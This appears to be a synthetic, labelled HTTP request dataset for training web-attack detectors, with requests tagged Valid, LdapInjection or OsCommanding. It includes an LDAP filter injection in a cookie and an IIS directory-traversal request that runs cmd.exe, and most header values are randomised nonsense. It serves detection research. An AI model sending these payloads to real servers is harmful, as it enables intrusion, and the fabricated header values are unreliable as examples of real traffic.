GET /eOl/0dmaniseanwn/pu2a/oiyv/war4cb29slq/o4Q-baUES.ON4/h29sc/rbljoxItnlennpsJemsr.gif?netcatlinkupdateW0QNAZ0divQ=26&eooAeh=tghaI92ualfnnD&ewdAnrsqhyt6O=4768&_nodeFXKk6Pi=orhavingcep&euso=s%7Cupdate%29s&aedr52ixI=yeet3&ulnevepetHs=f1owinoeidted&hTfsboe=1t&w26ndatTsh=hosa3umBS1tcqt&Adi18b=aigptb&nehledcahD=haysmvdyxRm&htrnoboide=shlc%7C&artrgsIAueaR=h8hT&psmflh0vsk4adt=8tZygpkTF_h9&eweye=7650911 HTTP/1.1
Host: 182.3.189.144:68
Connection: nywttrN
Accept: text/plain;q=0.7, text/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.3
Accept-Language: if4ebss7-im, n09u9es-bb
Cache-Control: max-age=7330
Client-ip: 81.222.10.214
Cookie: QS=6;poanm=lst2tliptn5l
Cookie2: $Version="06"
Date: Sat, 03 Mar 07 10:14:03 GMT
ETag: W/"5HhJBWzo8LWOT0kMx"
Expect: ijef0
From: scmetNE@looeei.net
If-Modified-Since: Tue, 10 Feb 09 24:32:49 GMT
If-Unmodified-Since: Sun, 25 Sep 05 10:45:03 CET
If-Match: *
If-None-Match: "irsBz3kVmSzyGqIEwmGo"
If-Range: "98jJ7HXq7HK03k2olcyG"
Max-Forwards: 12
MIME-Version: 9.5
Pragma: t1iIiT=dvrl
Proxy-Authorization: lufbu 9a7to=4tizhryy
Authorization: Basic dGJvczBwOnhJTmRJdGVp
Range: 4-,-68,1577-
Referer: /Rcsgoeo/ts1n/ruscmo.txt
TE: chunked
Trailer: Pragma
User-Agent: po1obtoeeaIE3bChcers
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 630x717
Via: 5.9 www.uawrb.tiff
Transfer-Encoding: gzip
Upgrade: c7rdns/2.9, smg8/1.8
Warning: 595 172.135.97.168 "thilgO" 
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21753
Start - Id: 23207
class: Valid
GET /sFhslxEt4/eC-NgQljYt2/eLFClQIhT5TUJX/fE_yaOo/gerjnitntdnrfpDoy/dBrF.4WDt-WicWjqP2_/0s.asp?hssrgoE=iiem&Eqeeatt=4&7fs=0951&Aga=ooptas%24esnoobject5eaaeVb HTTP/1.0
Host: 78.111.28.79
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-5, koi8-r;q=0.7
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=4516
Client-ip: 12.26.245.169
Cookie: oo1=ceendldft
Cookie2: $Version="5"
Date: Wed, 13 Feb 08 06:34:04 GMT
ETag: W/"0ZVn13xrxWW7HBrLmF-U"
Expect: el7t=uhur;n5nljo1c=csTlhyve
From: prra@pwbtk.it
If-Modified-Since: Sun, 04 Apr 10 20:18:35 UTC
If-Unmodified-Since: Tue, 14 Feb 06 17:58:30 UTC
If-Match: *
If-None-Match: "yl0lWQ3LEjuSFM01X5"
If-Range: "46xzdrnpV-bf1rJ7dHk"
Max-Forwards: 8975
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZU9lY2c6ZG9lZQ==
Range: -30,07-2
Referer: http://www.kjDon.st/crrmh/couankb/Xpx60etp/arxn8tu7.htm
TE: gzip,trailers
Trailer: Trailer
User-Agent: nMWcaJOA0 http://www.g9EnO.ch
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 973x7584
Via: 2.9 www.eErsaueh.js
Transfer-Encoding: gzip
Upgrade: enbe/7.1, 5nea/2.6, bie0n/5.7, ueru/7.3
Warning: 740 67.56.178.182:495 "aadiohcwejjhwee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 9726059
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23207
Start - Id: 37423
class: LdapInjection
GET /ada4.mspx? HTTP/1.1
Host: 147.146.233.39
Connection: keep-alive
Accept: video/*;q=0.2, application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 3e-ede, fqo-irgpnhsw;q=0.7
Cache-Control: max-stale=67376
Client-ip: 234.6.18.106
Cookie: hhstHtk=)  ( | (displayName=had*) (name  =    had* )(  mail=had*    )
Date: Fri, 03 Apr 09 17:58:48 CET
ETag: "PJuCbH0kU2Y@r1ru2kN3"
Expect: 100-continue
If-Modified-Since: Sun, 26 Dec 04 22:02:04 UTC
If-Unmodified-Since: Sun, 03 Apr 05 10:24:02 UTC
If-Match: "Q_USVu8akmOMPGqCJ"
If-None-Match: "SCe0WNDWrle5xwVlHX"
Max-Forwards: 80
Authorization: Basic RXRidXQ6ZVJlaGV0aW8=
Referer: /steoRf/ehly1a.mdb
Trailer: Max-Forwards
User-Agent: Mozilla/4.9 (compatible; Konqueror/6.8; WinNT; caeadee9; mhaEnCoo)
UA-OS: Solaris
Upgrade: suai/1.3
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37423
Start - Id: 44480
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 188.220.187.88:1
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 237.182.55.206
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="960"
Date: Fri, 29 Jan 10 09:42:42 GMT
ETag: "gKK7@uu-dxePQktSWetg"
Expect: nets=rpaui;afeisve8=e88t
From: xeaiisnn@jemn.de
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Tue, 07 Oct 08 21:39:33 GMT
If-Match: "-2f-zGAdk8@WgGA-fWr_"
If-None-Match: "k6l2PoLg45XvUvT"
If-Range: *
Max-Forwards: 58
MIME-Version: 9.7
Pragma: e='etee'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic YjBUenk6b0FrdGllZWg=
Range: 31467-04,46-
Referer: /uvTw/netoqEs/esnraw/37meukni/hdeei.png
TE: gzip,trailers
Trailer: Trailer
User-Agent: 7enpirt/0.5
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4559x569
Via: lni/4.6 www.m4upn.gif, 5.8 www.iOREoH.jpg
Transfer-Encoding: deflate
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44480
Start - Id: 32680
class: Valid
POST /iMn0RdIP3qNa/0DZJYYlgBkcS0a/ezkTqgv@xjDYUng/sat.css? HTTP/1.0
Content-Length: 288
Content-Language: tnm,aht6eN3
Content-Encoding: identity
Content-Location: /scid/tLaAxele/Hutoua.css
Content-MD5: Nm92YW9tbnJyenJlbDFlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jun 05 09:39:24 GMT
Last-Modified: Wed, 12 Apr 06 08:43:30 UTC
Host: www.ergextLmiI.cz:9
Connection: razt7s
Accept: video/*, application/x-tar;q=0.3
Accept-Charset: windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 216.228.51.28
Cookie: no=2ieonrmn;ioob9mete=hfisg;cihmansfeN=tY9ztlTKqT
Cookie2: $Version="97"
Date: Tue, 06 Feb 07 23:35:51 UTC
ETag: "vt6d70iKLf82XTBl7wPQ"
Expect: 100-continue
From: iayqTmip@redc.uk
If-Modified-Since: Wed, 07 Apr 04 13:25:25 GMT
If-Unmodified-Since: Thu, 26 Jun 08 01:04:21 UTC
If-Match: "cwUXEJxiH9sahaDB-kou"
If-None-Match: *
If-Range: "RyUjQ-7ZgrYK@Lo"
Max-Forwards: 343
MIME-Version: 4.5
Pragma: 1mn='6irepnhl'
Proxy-Authorization: Basic ZXhvcTlkaWU6bGFoOWE=
Authorization: Basic YWlyZTdtbjpyZThlcnNl
Range: 305943-294113,0-,-7372
Referer: /fzlycn/noTlUtd/Iitnt/eeita7/gwlgrlqg.exe
TE: trailers,trailers,deflate
Trailer: TE
User-Agent: a0s8hAc/3.2
UA-CPU: PowerPC
UA-Disp: 6556,232,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 535x929
Via: 6.3 184.149.74.202, 2.6 209.217.205.187, HTTP/3.6 www.utizcob.css
Transfer-Encoding: gzip
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 137 www.ta6mtat.tiff:4 "eeaReeaIsvfr" "Thu, 30 Aug 07 21:03:03 CET"
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 7602506068987
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

insE5hde5nnq3=eehd~sftvtto~&orkwxdnea5pet7i=euwbtA2Oeusa&a66enLboctSns=fegewateodeTtge&rmH9f1YhavingOhttp=n@AO4&4w6TssTacrerfi=aau&ptd53iodn=seiRe3fRtEwibcfe&ajHe8h0ers2a=f6Mug6pt&spipuoa7j=NcRE=e~&inre=tF_&DQMadminexecIEincludeKlocation=\n&cjfo=cxeoens0aka&t8dpeeBrdra=d toJe

End - Id: 32680
Start - Id: 23123
class: Valid
GET /lE0aoTsx3nnredEl/bW1nWY/t08wsnpUtd1/ia0T5eurWtninnesrd/d1Qk-runENMWRn0R/hd9oit2rrhjrkssr/etitmaE9llomtr/e@WdY0biV2/ydh/ofI5_n4yZeMs.ZpD/S4@OdAQlsbWGU/yWd9VVxugBjxZEw.gif?pF8AolaMttvtxs=lseUqeoi&t51i=liod&dpoloTtidgc=8&a0oe31=cwi&iVds0s=gvVBpCFnX43W&i4efiaehfsiatii=o4&aA75ZRmF=7t%3Baswu9ssb%3Dgroup+bylsfi HTTP/1.0
Host: www.eCgiiaSe.st
Connection: feeesIi
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew, x-mac-greek
Accept-Encoding: *;q=0.6
Accept-Language: oiOl-tuR3daye;q=0.4, E-ImRutq, onea-tueoli, s-dttEaabi, zce-rsu0e
Cache-Control: 4tfhno='dizoK'
Client-ip: 179.38.254.101
Cookie: e3fglocationBdL9Q=-bO1eeaccess_logae2wuHts;b1sisRu=l%vol;deleteStmp4VSoE=87791
Cookie2: $Version="0"
Date: Thu, 04 May 06 02:41:41 CET
ETag: "3.I9kRFBydMo6wPbyXB"
Expect: 100-continue
From: Hocan@osthutarg1.biz
If-Modified-Since: Sat, 19 Dec 09 12:29:24 GMT
If-Unmodified-Since: Tue, 24 Aug 04 03:10:13 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 23 Apr 07 11:18:20 CET
Max-Forwards: 8
MIME-Version: 8.3
Pragma: enht=8fu
Proxy-Authorization: sreaa nzhdndbb=rDnD
Authorization: Digest realm
Range: -515103
Referer: http://www.jwRhce.ch/lz6shaac/enegI.htm
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.1 (Machintosh; U; PPC Mac OS X 1.4; al-vb; rv:4.9.6) Gecko/52780421
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: 5.0 107.111.147.105:344
Transfer-Encoding: t5e7
Upgrade: 3TN5i/2.0, ahqf9e/8.2, azaefr/2.4
Warning: 833 www.aoOY.gif:0 "EwtnsedDuiLseekhe" "Fri, 03 Mar 06 17:54:30 GMT"
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 026545042
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23123
Start - Id: 12881
class: Valid
GET /oQLbY-ZEl.MA32AWV/pSs/roYtxluqnoyd4oEn40a/RNc9iaap8ui8zpewo/NreplacefCmocha4g/zWhG_wN5ARZAd/P2puiys.jsp? HTTP/1.0
Host: 18.120.159.10
Connection: close
Accept: audio/*;q=0.1, application/x-tar;q=0.8
Accept-Charset: x-mac-arabic, us-ascii;q=0.3, iso-2022-kr, iso-8859-8-i;q=0.9
Accept-Encoding: compress;q=0.1, compress;q=0.9
Accept-Language: *
Cache-Control: cae='roasdoe'
Client-ip: 243.131.60.170
Cookie: Iaona1diew=athnwootd8u;pphsTcNnysi=9449;8eeshn=2uIdtuzCzsd3ra;ehcsmeGepir=1;tlfN6tr7wh=5;eqroreOoe=44015424
Cookie2: $Version="53"
Date: Sun, 02 Sep 07 06:08:40 GMT
ETag: "mmdGZ50_cZ31.mguu."
Expect: 100-continue
From: dt56@hx2gENt.it
If-Modified-Since: Fri, 20 Nov 09 08:11:28 CET
If-Unmodified-Since: Wed, 23 Dec 09 12:04:40 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Dec 09 17:09:38 GMT
Max-Forwards: 4
MIME-Version: 5.7
Pragma: rl='ynhpzhLy'
Proxy-Authorization: NTLM bmZlY2dlYWVldG9vZXR0SGxob2VPaHRWZXN1YTVlNDl0ZWh1MXJzbWlud2Fy
Authorization: Basic czc4czp0aHpPbA==
Range: 35161-,-2,70941-
Referer: /p9asioa0/dfueca7e/a1tdis04/eaia.nsf
TE: gzip;q=0.4,trailers,trailers
Trailer: Referer
User-Agent: sNdBVKiJNp http://www.ismAcE.be
UA-CPU: StrongARM
UA-Disp: 8359,2395,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 535x377
Via: wsAae/8.2 61.32.167.111, HTTP/8.4 219.166.137.130
Transfer-Encoding: compress
Upgrade: gjsayt/7.7
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 4907746729509688
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12881
Start - Id: 28197
class: Valid
GET /f0KtQm@c7XhQAw.ANT-/t8NM8rHNyT/apVbue3RPkjd/bp/pwt/t4832zw1.YwJi5/en1Le@id/d4ralshe.swf? HTTP/1.0
Host: 142.60.211.47:92
Connection: close
Accept: video/*, image/png, audio/x-wav;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: elt-l;q=0.5, hOgc-i;q=0.5, btai-p
Cache-Control: no-cache
Client-ip: 208.143.114.201
Cookie: p0pd=o7ie5hsua
Cookie2: $Version="4"
Date: Wed, 23 Sep 09 04:33:15 CET
ETag: "HAKS-GZxAfZFJzHFo@3"
Expect: 100-continue
From: haidri@m6zcet8gA.ch
If-Modified-Since: Wed, 02 Apr 08 08:06:32 UTC
If-Unmodified-Since: Wed, 15 Sep 04 04:03:19 CET
If-Match: "46-U77R4.berssf"
If-None-Match: "ZmxW-M0M5dHBfH5HT"
If-Range: "FO2bi@mhpNrvBJbR"
Max-Forwards: 887
MIME-Version: 7.3
Pragma: y6dosi=7lctnd
Proxy-Authorization: Digest qop=Rnunev
Authorization: eto8 uEecs=rhne5mt
Range: -569,-376,5-
Referer: /Erel/san1h/gAPtld/rets5.css
TE: deflate,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 5.6; ee-so; rv:9.2.9) Gecko/06396977
UA-CPU: x86
UA-Disp: 0207,3028,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8070x456
Via: HTTP/8.3 58.34.1.36:72, 5.4 www.heleh.htm, 3.1 67.72.12.121:3801
Transfer-Encoding: gzip
Upgrade: trp/1.7, uirtns/0.1, ein/9.5, nhk0a/7.9
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 3105222216298089545
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28197
Start - Id: 25445
class: Valid
GET /NesLtrta0l/mio/saiesrriet7otkfan.mspx? HTTP/1.0
Host: 26.161.128.21
Connection: keep-alive
Accept: application/*, video/*, video/mpeg
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, gzip;q=0.2
Accept-Language: *;q=0.7
Cache-Control: e=yowu
Client-ip: 67.131.170.42
Cookie: ioi=208;Zl6RohQG=gta;taeNw6ee=q|;ahthkisbaiilnt=nlr
Cookie2: $Version="69"
Date: Fri, 11 Jul 08 04:24:25 CET
ETag: W/"_WW6LnvaU@@pnen4r"
Expect: shloenO=shAb
From: 2nOl@m8et6rtby.cz
If-Modified-Since: Fri, 01 Oct 04 18:43:02 UTC
If-Unmodified-Since: Wed, 21 Apr 04 01:29:17 CET
If-Match: "3F5JHHmVXF_@Toz9"
If-None-Match: *
If-Range: Thu, 19 Jan 06 17:53:45 GMT
Max-Forwards: 2260
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="0Wocgc42"
Authorization: aEo1m tero=aohei
Range: -7599
Referer: http://www.fZue.net/luwfy/5ewona.swf
TE: trailers
Trailer: Connection
User-Agent: yptnjtit
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 407x092
Via: FTP/9.1 www.tjitahde.gif, 2.9 www.adrlnt1.htm
Transfer-Encoding: compress
Upgrade: Eaqa/3.2, ndd/9.1, pel/7.0, tto1c/5.3
Warning: 426 www.nrhesd.shtml "alyndt" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 588564161052
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25445
Start - Id: 12754
class: Valid
GET /wI9oTl/m7m6XMjchild7E/x@M/passwdJopen/IiW.updateddeNGEKJ/h-mi/hAY2X/7qw9VimLHa8y/fRE@@selectP-C5r_ZY.pl?arrae=+z%259eu&0aelgisauTma4na=eebht&whereSxYaETkS3Zc=0r&adnrlmLoeh4ny=n+swimgn1e&nlnrildrsrao=t+tNhgb%3BK%25uwindow.openLsot&aiaeirdrkoee=m7ufrlt&ue6kn9ucc=ra%26t&hieuaojostlFF=lrdst8bqeTnDmtm5&php5rK=pahenidt&u1cobh6btle4=0ali-zr%2Bn&elk=70460970&ettneee81ne=agC_MQC HTTP/1.0
Host: www.oWesmuti0.net
Connection: fmg9gue
Accept: audio/basic, audio/basic, audio/*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: koi=batiraH
Client-ip: 4.223.155.209
Cookie: 8rhhsw6dxbta=i6N;si33adjyooxf=uqi;5aas1ke=ot omSa0;eeybebS=tD~lsvbscriptmag7log;iuouS=]h;8Ss=<ffqo&ravs) 
Cookie2: $Version="3"
Date: Sat, 07 Mar 09 13:21:44 GMT
ETag: W/"7UpOQ9pxCWpDd78BH5XA"
Expect: 100-continue
From: ahe6lcme@tscunoU.st
If-Modified-Since: Sun, 25 Oct 09 18:45:04 CET
If-Unmodified-Since: Tue, 08 Apr 08 04:59:19 CET
If-Match: *
If-None-Match: "t13gmVtvWO@GOAn"
If-Range: Tue, 21 Jun 05 09:22:06 GMT
Max-Forwards: 112
MIME-Version: 1.4
Pragma: 1reUbm0c='nigiJ'
Proxy-Authorization: eqxrte snsH=briit
Authorization: Digest opaque="iftc9s"
Range: 23407-76
Referer: /inWrvg.msf
TE: trailers
Trailer: If-Modified-Since
User-Agent: 9iq3ain/0.3.9.5.4
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 596x179
Via: HTTP/3.1 182.89.231.0, 9.2 11.186.89.24, 4.6 www.rsOomg.jpg
Transfer-Encoding: gzip
Upgrade: al9/4.2, fue/6.6
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 186.146.163.150
X-Serial-Number: 66246
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12754
Start - Id: 24343
class: Valid
GET /maoyOyA6/jpphscnoRntbifuil/a4a1A2lZsBsjUnGwjv/child28XbhYQCzTQI/e3IBMaKca0gNzk/8hul87/s73/b4B_FpL/eNPXSVINPfT@TSnRvzC/t46cspsee4aIteo.js?3F@Oh2-MS79=62&scriptEIWstyleNscript_M=dzhUiono0u HTTP/1.0
Host: www.1rer.be:80
Connection: Ainm
Accept: application/zip, video/mpeg
Accept-Charset: iso-8859-7;q=0.3
Accept-Encoding: gzip;q=0.9
Accept-Language: *
Cache-Control: min-fresh=134
Client-ip: 167.219.3.35
Cookie: u8kntPn=aipmoglike;2Eeynrbddxeoqh=34354;erFnDe8biiseeoh=th1t;ehMhcnl=8;n9ew=iFq7nz4snrH7Wy;s8orfrXnyS4=7l 9intyao
Cookie2: $Version="7"
Date: Fri, 29 Dec 06 24:29:22 GMT
ETag: W/"Zh7VkrOSovWSth2"
Expect: niis7f=eutxj0i0;rzor=sDcnm
From: 5hRu@STpwssetis.be
If-Modified-Since: Tue, 01 Dec 09 23:57:36 CET
If-Unmodified-Since: Mon, 14 Jan 08 13:04:41 UTC
If-Match: *
If-None-Match: "6l_6gkxahvu-@3u9hPfE"
If-Range: Sat, 17 Sep 05 24:26:26 UTC
Max-Forwards: 30
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM ZXNJZ3JOdGNhaG53Y29jSThkdGR0ZTBsbHJpdGV1MHJ1ZXNzbmhyZ2ZudFJpcGU=
Range: 3174-4551,6064-
Referer: /zqeSha/d3DtAC/aTiise/iatobs/db3eda.jpg
TE: deflate,gzip;q=0.6
Trailer: User-Agent
User-Agent: pr0a0f8vt/8.3.8
UA-CPU: StrongARM
UA-Disp: 544,888,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 352x5203
Via: 0.7 www.0dbr.jpeg, 4.0 127.240.165.179:72, 7.3 138.17.55.45
Transfer-Encoding: identity
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 200.38.79.148
X-Serial-Number: 6737813475044771
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24343
Start - Id: 28360
class: Valid
GET /f-9NHRfjEZGS8._rnTR./xdffw/ior8oI0stcl/e7LphW5GuK9nq0Of/sTw-ZulP39_oVJa/naLesaiiw8thrleoao/0DpHaB9yNSNvng6/dhhiiioihzsEb0tons/nioleubjbe/axQDkoXMW/iHdI9/ei9hgnaej.htm?U@QHupdate_OCf=1rcp%3Fteuoohr5Jiwo%40go9&lAkaw5=%3B8%3Dboot.inilibett2-&mclr=345&oOyrc=r%3Dhxf0sr+hUrpassthrun&ah1enTeeExj=ndtl&srzawrwaflu8ni=znentu&eiGODti=sswx6fue&h9Cra4fe=zhYuc&4outtontrc6=n80%25iN%3Feeatten&srwhhWion=0rmhr5tsouvjund&tuTsxtkh=s4&ihbLsoeja=0 HTTP/1.1
Host: 100.168.8.164
Connection: keep-alive
Accept: image/jpeg, text/*, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: deh-8t2zyeu, m-kn, aeAzurj-mziE, et9D-Fte;q=0.7
Cache-Control: no-cache
Client-ip: 228.194.151.128
Cookie: o0eva7PhTz=eIotuhnatpdn;r@etcB.R=o9-;9EEP2A=21686572
Cookie2: $Version="196"
Date: Sun, 13 Jul 08 02:29:11 CET
ETag: "Z8_.2x5.bSAj.YwmPE7"
Expect: e7satqp
From: sszbHesr@flnNa.be
If-Modified-Since: Mon, 16 Mar 09 16:33:00 GMT
If-Unmodified-Since: Wed, 22 Jul 09 15:03:12 UTC
If-Match: *
If-None-Match: "SEwLq04Vpy3i5XqyG"
If-Range: Wed, 03 Mar 10 24:57:44 GMT
Max-Forwards: 0576
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic dGVTNGE6VGZ0aA==
Authorization: Basic bUhrZDQ6YW5lYW1M
Range: 5-362340,-79,830-62
Referer: /Lomh.php
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.3 (Windows; U; Win98 8.4; uq-ad; rv:0.4.5) Gecko/85526266
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6491x0728
Via: 6.6 73.220.9.40:89020, 3.3 242.131.105.95:0941
Transfer-Encoding: identity
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 177 www.muti.png:3 "tdhEamO8ynutbtlRsboo" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 3075652
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28360
Start - Id: 18854
class: Valid
GET /8cwgetIcyboot.iniQ2/ik3/Hkieea1dsclmRweemr/LC/eetuEgiee.mdb?Is4c=8&rhadhb9csaI3frI=i%29htpassu1ueew&ax5riuaeIepot=R5fgs&e27tohafowHraS=eP%3F%7En HTTP/1.1
Host: 15.37.27.190
Connection: oimnrav5
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 108.170.236.163
Cookie: fEondt2=558786966;Hhtewsdnaawe=3955849;pirs0ooput=6;dceN3s=eyn7llfhbhlect;ehauo=yZlegt
Cookie2: $Version="1"
Date: Sat, 14 Oct 06 14:53:44 CET
ETag: W/"6ZrYY90QHeyeZaJNoL1G"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Sun, 07 Sep 08 13:11:18 GMT
If-Unmodified-Since: Sun, 20 May 07 21:27:24 CET
If-Match: "gFc@P5Sgn-rAK@3h27"
If-None-Match: *
If-Range: Sat, 12 Feb 05 05:47:03 GMT
Max-Forwards: 39
MIME-Version: 1.1
Pragma: rDLmyTio='ouamo'
Proxy-Authorization: jniene rlc0of=edatai
Authorization: Digest opaque="urietee"
Range: -4
Referer: /jeeltt/xd9ertob.htm
TE: trailers,trailers
Trailer: TE
User-Agent: oe5eEreI (tiHLQc; ynZ9weUKu; olUsvcOf; mBweCJm; mv3QIs)
UA-CPU: PowerPC
UA-Disp: 8023,7803,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 928x9572
Via: 8duoi/5.1 www.bnt6on.js, 3.1 76.159.116.49:86, HTTP/1.1 77.245.171.198:73
Transfer-Encoding: identity
Upgrade: hhse/5.8, OOtIlr/6.6, swie/9.3, mroc/7.7, taRta/6.4
Warning: 435 www.Z2So.html "fveLnh1dabiCigaSahew" 
X-Forwarded-For: 77.105.66.53
X-Serial-Number: 8138044161
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18854
Start - Id: 33800
class: Valid
POST /imljowDxc93UWOVv0xdQ/ifawE2/3Qdol3i/0ZyimtwzecNmtja0rmh_/n41VGC5Cre0l/bnu1.Tbu3TFHq/4r/qh/LRQprm/tRKt/otTniEtieenc/klhrgooRnecgtrd.sh? HTTP/1.0
Content-Length: 70
Content-Language: pr,s
Content-Encoding: gzip
Content-Location: /tpyr/hntru/gaeos/uIeae.nsf
Content-MD5: bnpkcjBlb3NXdnROZWVobw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Aug 06 14:03:02 UTC
Last-Modified: Sat, 25 Jun 05 07:14:45 GMT
Host: 157.152.224.30
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, utf-8;q=0.9, windows-874;q=0.2, euc-tw;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 186.46.246.76
Cookie: dkjqo9sy=36081;snmiiy2lmsudret=9725071;1igepne=a3;ryuNJCc=0301;usuwa=cfpOko2dlhc7
Cookie2: $Version="808"
Date: Sun, 07 Feb 10 04:43:07 GMT
ETag: "AxBBjjVKYscn_aWGz"
Expect: c9cyhx
From: dmRxngT@spiuhlni.ch
If-Modified-Since: Wed, 15 Feb 06 08:25:24 GMT
If-Unmodified-Since: Tue, 11 May 04 11:41:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 08 Jan 06 19:20:12 UTC
Max-Forwards: 27
MIME-Version: 7.3
Pragma: ove4e=f
Proxy-Authorization: Basic c29lM2F2eWE6dWRlb2c=
Authorization: Basic T2x5NmE6YTA0cmdm
Range: 26855-,847-,-23
Referer: http://www.4hS9.it/dttlae2/hmAneg/hlhh/urdhLn.mspx
TE: trailers
Trailer: Accept
User-Agent: lU@UfKtIH http://www.0jnkO.st
UA-CPU: x86
UA-Disp: 384,417,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 551x0838
Via: 2.6 246.156.44.149:550, 2.3 207.182.75.228:4
Transfer-Encoding: compress
Upgrade: ait/6.8
Warning: 439 www.eoera.jpg "bg9r8au3atu" "Fri, 15 Feb 08 09:18:04 UTC"
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 9495993319607061113
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RaR22AFije=lfdc&a1dhctetm=sjysuwnvnwhO&oAuyc2clbts=3440598&swEe=qpCyer

End - Id: 33800
Start - Id: 1238
class: Valid
